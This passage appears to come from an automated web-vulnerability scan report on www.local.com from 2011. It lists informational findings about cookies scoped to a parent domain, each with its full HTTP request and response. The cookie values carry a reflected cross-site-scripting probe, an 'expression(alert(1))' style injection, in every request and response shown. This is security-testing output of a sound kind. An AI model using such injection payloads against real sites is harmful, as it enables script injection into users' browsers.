Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 5900
Date: Thu, 03 Feb 2011 16:49:33 GMT
Content-Length: 5900
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.22. http://www.local.com/dialogs/account/acctreg.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/account/acctreg.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dialogs/account/acctreg.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 9239
Date: Thu, 03 Feb 2011 16:54:19 GMT
Content-Length: 9239
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:54:19 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...

7.23. http://www.local.com/dialogs/network.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/network.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dialogs/network.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /error.aspx?aspxerrorpath=/sitetemplates/local.com/dialogs/network.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 202
Date: Thu, 03 Feb 2011 16:53:41 GMT
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:41 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.aspx%3faspxerrorpath%3d%2fsitetemplates%2flocal.com%2fdialogs%2fnetwork.aspx">here</a>.</h2>
</body></html>
...[SNIP]...

7.24. http://www.local.com/dialogs/register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/register.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dialogs/register.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27119
Date: Thu, 03 Feb 2011 16:55:56 GMT
Content-Length: 27119
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:55:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>www.local.com-Register</title
...[SNIP]...

7.25. http://www.local.com/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86267
Date: Thu, 03 Feb 2011 16:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...

7.26. http://www.local.com/events/category/music/dallas-tx.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92872
Date: Thu, 03 Feb 2011 16:44:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...

7.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87986
Date: Thu, 03 Feb 2011 16:44:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...

7.28. http://www.local.com/events/category/sports/dallas-tx.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 90349
Date: Thu, 03 Feb 2011 16:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 90349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...

7.29. http://www.local.com/faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /faq.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; 